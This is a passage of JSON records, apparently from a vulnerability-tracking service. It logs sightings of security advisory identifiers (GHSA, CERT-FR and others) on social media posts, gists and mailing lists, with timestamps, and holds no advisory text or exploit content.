"https://infosec.exchange/users/cR0w/statuses/115016686292744862", "content": "", "creation_timestamp": "2025-08-12T16:15:55.798871Z"}, {"uuid": "932bda0e-4495-4bad-9d73-0ff66983bf7c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-22wq-q86m-83fh", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115016829455362878", "content": "", "creation_timestamp": "2025-08-12T16:52:20.295661Z"}, {"uuid": "3a10bcaf-efe0-4c5f-b173-5fe58c0563dd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w62p-hx95-gf2c", "type": "seen", "source": "https://bsky.app/profile/hnbest.bsky.social/post/3lyjnmxppw52j", "content": "", "creation_timestamp": "2025-09-11T02:00:14.132382Z"}, {"uuid": "3a3a9724-1fe3-430e-b1e6-0e394b90a4a6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9ggr-2464-2j32", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115249183875342859", "content": "", "creation_timestamp": "2025-09-22T17:43:07.318089Z"}, {"uuid": "338876e9-4125-4d94-a051-72b3666cdeea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-547r-qmjm-8hvw", "type": "seen", "source": "https://bsky.app/profile/736b.moe/post/3m65jrxzeqx2p", "content": "", "creation_timestamp": "2025-11-21T14:50:40.175852Z"}, {"uuid": "cfb45f65-8881-4ce9-ac8a-383b63b620d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-344w-77p7-gx2c", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115374862955273092", "content": "", "creation_timestamp": "2025-10-14T22:24:57.975355Z"}, {"uuid": "32df749e-4f9d-4b0e-a62a-a77d69e69ff6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-j2xj-h7w5-r7vp", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115249677033042812", "content": "", "creation_timestamp": "2025-09-22T19:48:33.175145Z"}, {"uuid": "4cb25163-9a5e-4d08-87de-1ace064b4dbb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jfh8-c2jp-5v3q", "type": "seen", "source": "https://gist.github.com/c0axial/f499717d0046678e19e2f0d43b9d4b55", "content": "", "creation_timestamp": "2025-08-14T14:03:30.000000Z"}, {"uuid": "938c05da-c618-438e-99cf-1ca08470ed4f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-435c-mg9p-fv22", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115249682592421976", "content": "", "creation_timestamp": "2025-09-22T19:49:57.121635Z"}, {"uuid": "fe1dd8d1-cc66-4236-89d9-820e09974278", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-037", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3lydcirlxmh2p", "content": "", "creation_timestamp": "2025-09-08T13:25:07.651810Z"}, {"uuid": "78b12522-695f-49f7-b0c5-54fe9e16c1da", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w5fx-fh39-j5rw", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115249965654751816", "content": "", "creation_timestamp": "2025-09-22T21:01:56.293332Z"}, {"uuid": "129753e7-bd94-4d90-9f80-6e36efb60205", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v2c8-vqqp-hv3g", "type": "seen", "source": "https://seclists.org/oss-sec/2025/q4/200", "content": "", "creation_timestamp": "2025-11-18T20:28:46.000000Z"}, {"uuid": "a6355362-769f-44e1-b223-05b390a88b4d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hrpp-h998-j3pp", "type": "seen", "source": "https://gist.github.com/MOVZX/1fea6a8d61a3815ce0ec045067cf276a", "content": "", "creation_timestamp": "2025-11-09T21:48:39.000000Z"}, {"uuid": "372e09cb-a389-4926-b302-ceeb67393af7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mrjm-qq9m-9mjq", "type": "seen", "source": "https://seclists.org/oss-sec/2025/q3/113", "content": "", "creation_timestamp": "2025-08-16T15:31:58.000000Z"}, {"uuid": "d940b544-cd48-413f-a06e-cefe460c5c22", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6px8-22w5-w334", "type": "seen", "source": "https://gist.github.com/konard/0588944bf0af8e1132d0c68d1c1d2711", "content": "", "creation_timestamp": "2025-09-23T03:04:11.000000Z"}, {"uuid": "005909c9-c7e1-4bd7-978a-7b7f36a5b8a6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-x5qj-9vmx-7g6g", "type": "seen", "source": "https://gist.github.com/konard/0588944bf0af8e1132d0c68d1c1d2711", "content": "", "creation_timestamp": "2025-09-23T03:04:11.000000Z"}, {"uuid": "07157453-4519-44dc-8a55-7cea7540aaad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5crp-9r3c-p9vr", "type": "seen", "source": "https://gist.github.com/konard/0588944bf0af8e1132d0c68d1c1d2711", "content": "", "creation_timestamp": "2025-09-23T03:04:11.000000Z"}, {"uuid": "4461d90b-3071-47a0-906c-e1f91b1cbb66", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jhjx-x4cf-4vm8", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115493614774031888", "content": "", "creation_timestamp": "2025-11-04T21:45:06.675550Z"}, {"uuid": "5123bd17-a4fc-40f2-a07a-a99ac09a050a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-35g6-rrw3-v6xc", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115328061935482403", "content": "", "creation_timestamp": "2025-10-06T16:02:50.840360Z"}, {"uuid": "149e3a1c-52ed-452f-9964-e0c251b955c7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-x697-jf34-gp5x", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115589142587853429", "content": "", "creation_timestamp": "2025-11-21T18:39:05.162958Z"}, {"uuid": "8448659b-b036-4362-bfb5-6efd18000593", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g8c6-8fjj-2r4m", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115328125762428936", "content": "", "creation_timestamp": "2025-10-06T16:19:04.794749Z"}, {"uuid": "50fd35e0-5727-4ca8-a6fb-7e00b5816861", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mvfx-ph7m-qm37", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115589142587853429", "content": "", "creation_timestamp": "2025-11-21T18:39:05.241333Z"}, {"uuid": "29a34b32-c1cc-4a22-9861-9d1ff1d5486d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gwf3-8gm3-qrmj", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115589147730637509", "content": "", "creation_timestamp": "2025-11-21T18:40:23.690946Z"}, {"uuid": "996e2456-60c9-46c7-994a-9a8fd5119cc2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-034", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3lwqh44ddux2e", "content": "", "creation_timestamp": "2025-08-19T08:01:41.075139Z"}, {"uuid": "dfec5c59-be91-4fac-b8c8-b52f3a68f114", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fcpm-6mxq-m5vv", "type": "seen", "source": "https://bsky.app/profile/undercodenews.bsky.social/post/3lwtbzmtvvm2u", "content": "", "creation_timestamp": "2025-08-20T11:08:48.740123Z"}, {"uuid": "6047b6e4-c680-4b18-8ef1-7da4f2bc5c65", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20180328-smi2", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115062090544361275", "content": "", "creation_timestamp": "2025-08-20T16:42:51.314904Z"}, {"uuid": "4018d8ea-17bb-42b6-b9cc-aaa133c2d646", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-47m2-4cr7-mhcw", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115350800290939240", "content": "", "creation_timestamp": "2025-10-10T16:25:30.433363Z"}, {"uuid": "d9e377eb-288c-446a-858a-f4d092f270cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mmxm-8w33-wc4h", "type": "seen", "source": "https://seclists.org/oss-sec/2025/q3/131", "content": "", "creation_timestamp": "2025-08-20T19:47:18.000000Z"}, {"uuid": "5fbf2780-712f-44a3-ab89-d15e658c9162", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-039", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3lyvash3x6w2i", "content": "", "creation_timestamp": "2025-09-15T16:42:36.344580Z"}, {"uuid": "51050382-2969-4e73-aeec-e22e1c9d8196", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wrh9-463x-7wvv", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115073430244235194", "content": "", "creation_timestamp": "2025-08-22T16:46:40.229651Z"}, {"uuid": "e123b36f-8ee9-4943-865f-859914c79cb3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-95v9-hv42-pwrj", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115074231613639255", "content": "", "creation_timestamp": "2025-08-22T20:10:27.569930Z"}, {"uuid": "01576d54-c709-4add-b9de-756d508edf7b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-044", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/115389814744948859", "content": "", "creation_timestamp": "2025-10-17T13:47:25.425472Z"}, {"uuid": "1b869917-6fe4-42f8-8e60-3238ed5428a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-m8jr-fxqx-8xx6", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115548667891057809", "content": "", "creation_timestamp": "2025-11-14T15:05:50.403635Z"}, {"uuid": "17d4c986-a8cc-45a9-9058-3faf4ffe072f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mx7m-j9xf-62hw", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115548667891057809", "content": "", "creation_timestamp": "2025-11-14T15:05:50.504750Z"}, {"uuid": "3f40e889-1521-4c7a-88e0-b7f4d457103e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2023:5244", "type": "seen", "source": "https://gist.github.com/ronlavi2412/47a41f60b92014cab804b1851d90c31a", "content": "", "creation_timestamp": "2025-09-30T13:32:38.000000Z"}, {"uuid": "5b3a6f26-4a2d-461c-b631-088797a58af0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8h43-rcqj-wpc6", "type": "seen", "source": "https://bsky.app/profile/Whiskeyomega.cupoftea.social.ap.brid.gy/post/3m3pwbdncbss2", "content": "", "creation_timestamp": "2025-10-21T18:06:39.352911Z"}, {"uuid": "790bd260-ecfb-45af-a295-5c109234180c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-q428-6v73-fc4q", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115543020338148018", "content": "", "creation_timestamp": "2025-11-13T15:09:35.601505Z"}, {"uuid": "5adaecce-dce3-4dc2-85d4-1089a8d90f36", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2rq7-79vp-ffxm", "type": "seen", "source": "https://gist.github.com/ABartelt/3b53780c272d06c4063cad9330eb4f50", "content": "", "creation_timestamp": "2025-11-12T15:46:39.000000Z"}, {"uuid": "40e6ea1f-0559-4ddb-8cb8-7f6f1b4c4f2f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5v79-p56f-x7c4", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115447915824344640", "content": "", "creation_timestamp": "2025-10-27T20:03:15.858375Z"}, {"uuid": "70b9c30c-0e59-43ef-9b91-6d2ed3c59008", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9287-g7px-9rp4", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115543241220528720", "content": "", "creation_timestamp": "2025-11-13T16:05:46.026600Z"}, {"uuid": "864888de-8c56-4215-9d60-6048687452ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qwvm-x4xh-g2qq", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115543241220528720", "content": "", "creation_timestamp": "2025-11-13T16:05:46.123011Z"}, {"uuid": "c7e4ef34-7f48-4e9d-8fe7-4ab5b35a1335", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w62p-hx95-gf2c", "type": "seen", "source": "https://bsky.app/profile/hnws.bsky.social/post/3lyfkbk7n722s", "content": "", "creation_timestamp": "2025-09-09T10:49:30.923386Z"}, {"uuid": "5e8a8d1d-817e-4c40-9e4d-933032491552", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w62p-hx95-gf2c", "type": "seen", "source": "https://bsky.app/profile/hnbot.gsuscs.xyz/post/3lyfkufubzs2e", "content": "", "creation_timestamp": "2025-09-09T11:00:04.104480Z"}, {"uuid": "bee6fd2d-ecf1-42a3-bb2a-d7ba845ed439", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gv8h-7v7w-r22q", "type": "seen", "source": "https://cyber.gc.ca/en/alerts-advisories/docker-security-advisory-av25-708", "content": "", "creation_timestamp": "2025-10-29T17:32:49.000000Z"}, {"uuid": "4aa6902c-e2e0-43df-a6bf-0d3d9b015fa6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-39hr-239p-fhqc", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115538316443414289", "content": "", "creation_timestamp": "2025-11-12T19:13:20.033304Z"}, {"uuid": "9cf6f508-1e30-407a-a4ec-d14a5eb00884", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-035", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3lx7zbob7aa2m", "content": "", "creation_timestamp": "2025-08-25T12:36:51.150167Z"}, {"uuid": "6c515123-0482-4e7f-be5d-8c08e17820c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-035", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/115089434859724827", "content": "", "creation_timestamp": "2025-08-25T12:36:52.762235Z"}, {"uuid": "f44d7323-ff8c-4d76-a8d4-e1dc327ad059", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6852-76c5-6cmg", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115538324141138291", "content": "", "creation_timestamp": "2025-11-12T19:15:17.466942Z"}, {"uuid": "8db01e2b-e2da-455c-a18f-8582662dec2b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-035", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3lxa7z4vnmy2t", "content": "", "creation_timestamp": "2025-08-25T14:37:20.633429Z"}, {"uuid": "82dfebf5-7f74-438c-9b6c-7e014ab4761f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w62p-hx95-gf2c", "type": "seen", "source": "https://bsky.app/profile/newsyc200.bsky.social/post/3lyfxdieii52p", "content": "", "creation_timestamp": "2025-09-09T14:43:14.869144Z"}, {"uuid": "2707a01e-5898-4904-88ce-8cdae7208e52", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5cmr-4px5-23pc", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115091647432901046", "content": "", "creation_timestamp": "2025-08-25T21:59:34.103777Z"}, {"uuid": "33d4cbdf-f2d8-44da-a1d9-1822028c7119", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5cmr-4px5-23pc", "type": "seen", "source": "https://bsky.app/profile/bluesky.awakari.com/post/3lxaypwc4jh2i", "content": "", "creation_timestamp": "2025-08-25T21:59:35.234622Z"}, {"uuid": "1edd57a2-6f38-4e9e-9fc4-0b7f96d8e96b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4h98-2769-gh6h", "type": "seen", "source": "https://gist.github.com/Dustinturner44/3ad27248d52502710058e2c5f1bcde38", "content": "", "creation_timestamp": "2025-11-19T14:57:55.000000Z"}, {"uuid": "9f94e246-3de6-4923-b706-b6577cbfa9d7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fh55-q5pj-pxgw", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115096183396758767", "content": "", "creation_timestamp": "2025-08-26T17:13:05.319393Z"}, {"uuid": "abd6ee2f-9a6b-44d3-b343-c9e44a6b9832", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9f46-w24h-69w4", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115610852261225855", "content": "", "creation_timestamp": "2025-11-25T14:40:08.666942Z"}, {"uuid": "6da8977d-00f2-43b2-829d-ce98022da297", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7wv6-48j4-hj3g", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115610861120739101", "content": "", "creation_timestamp": "2025-11-25T14:42:23.931308Z"}, {"uuid": "d5de5f67-de42-4754-bbe0-0346f14e947c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xxxx-xxxx-xxxx", "type": "seen", "source": "https://gist.github.com/wullemsb/4f91878037a7c7391a756332605d3725", "content": "", "creation_timestamp": "2025-12-01T17:48:05.000000Z"}, {"uuid": "c015fa6d-7fca-4711-a13a-c6efa9cda844", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w48q-cv73-mx4w", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115651541601478240", "content": "", "creation_timestamp": "2025-12-02T19:07:58.587957Z"}, {"uuid": "a7faa8c7-d07d-4103-aef1-830dbc235f9e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-grx8-g27p-8hpp", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115543674662995941", "content": "", "creation_timestamp": "2025-11-13T17:55:59.889351Z"}, {"uuid": "9c3594d1-f39a-46b9-805e-3daeca97c2e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8gq9-rw7v-3jpr", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115543674662995941", "content": "", "creation_timestamp": "2025-11-13T17:55:59.978044Z"}, {"uuid": "6f5817fb-ae50-4d5a-bc23-9c1fe33a5e4a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4952-h5wq-4m42", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115610864814455085", "content": "", "creation_timestamp": "2025-11-25T14:43:20.101823Z"}, {"uuid": "8050795d-6336-4e98-b58e-42be3bca203e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xxxx-xxxx-xxxx", "type": "seen", "source": "https://gist.github.com/wdcs-kishansudani/bd0202112117cb8a2269fa1190eb5b79", "content": "", "creation_timestamp": "2025-09-24T10:59:00.000000Z"}, {"uuid": "ea39c566-7da6-45b9-bcf6-ca156411ef01", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-043", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/115366794855854060", "content": "", "creation_timestamp": "2025-10-13T12:13:12.113735Z"}, {"uuid": "0f1b89bd-d246-4c30-a7a0-96df6277f2f5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-c978-wq47-pvvw", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115538738234264393", "content": "", "creation_timestamp": "2025-11-12T21:00:35.829477Z"}, {"uuid": "ceccb12e-1400-49a2-ba6f-e8f932064ddf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2jjv-qf24-vfm4", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115261005955876055", "content": "", "creation_timestamp": "2025-09-24T19:49:37.911374Z"}, {"uuid": "ca808e54-bf4a-4b68-891d-5e5f474c5e4c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5crp-9r3c-p9vr", "type": "seen", "source": "https://gist.github.com/konard/c9108736d05ebf1cd04a209df3329c0a", "content": "", "creation_timestamp": "2025-11-04T01:24:03.000000Z"}, {"uuid": "d62c2b47-319e-42a9-abe6-f4dfedf7d832", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gxw4-4fc5-9gr5", "type": "seen", "source": "https://infosec.exchange/users/DarkWebInformer/statuses/115339990628749680", "content": "", "creation_timestamp": "2025-10-08T18:36:32.693209Z"}, {"uuid": "1ed4ad07-2066-46de-bb5c-a7a0fa80001d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-043", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3m337vxlset2u", "content": "", "creation_timestamp": "2025-10-13T12:33:02.390878Z"}, {"uuid": "49a2c250-98a1-41e2-b8dd-ef2e5daa0057", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hqrf-67pm-wgfq", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115261040066815825", "content": "", "creation_timestamp": "2025-09-24T19:58:18.341782Z"}, {"uuid": "555632d0-140d-49e7-8190-7f7d275eef8b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-59j7-ghrg-fj52", "type": "seen", "source": "https://gist.github.com/konard/c9108736d05ebf1cd04a209df3329c0a", "content": "", "creation_timestamp": "2025-11-04T01:24:03.000000Z"}, {"uuid": "b094f760-eaaa-4979-bcc1-0c130eed4d3c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-q7pg-qchv-3pc5", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115261215131493060", "content": "", "creation_timestamp": "2025-09-24T20:42:49.714130Z"}, {"uuid": "3c15620c-38c7-465d-b567-009a68c5eb81", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7944-xvv7-cv79", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115261215131493060", "content": "", "creation_timestamp": "2025-09-24T20:42:49.821617Z"}, {"uuid": "99781864-1f37-4b99-bba4-3dc11357185b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hm85-2j65-j8j2", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115261215131493060", "content": "", "creation_timestamp": 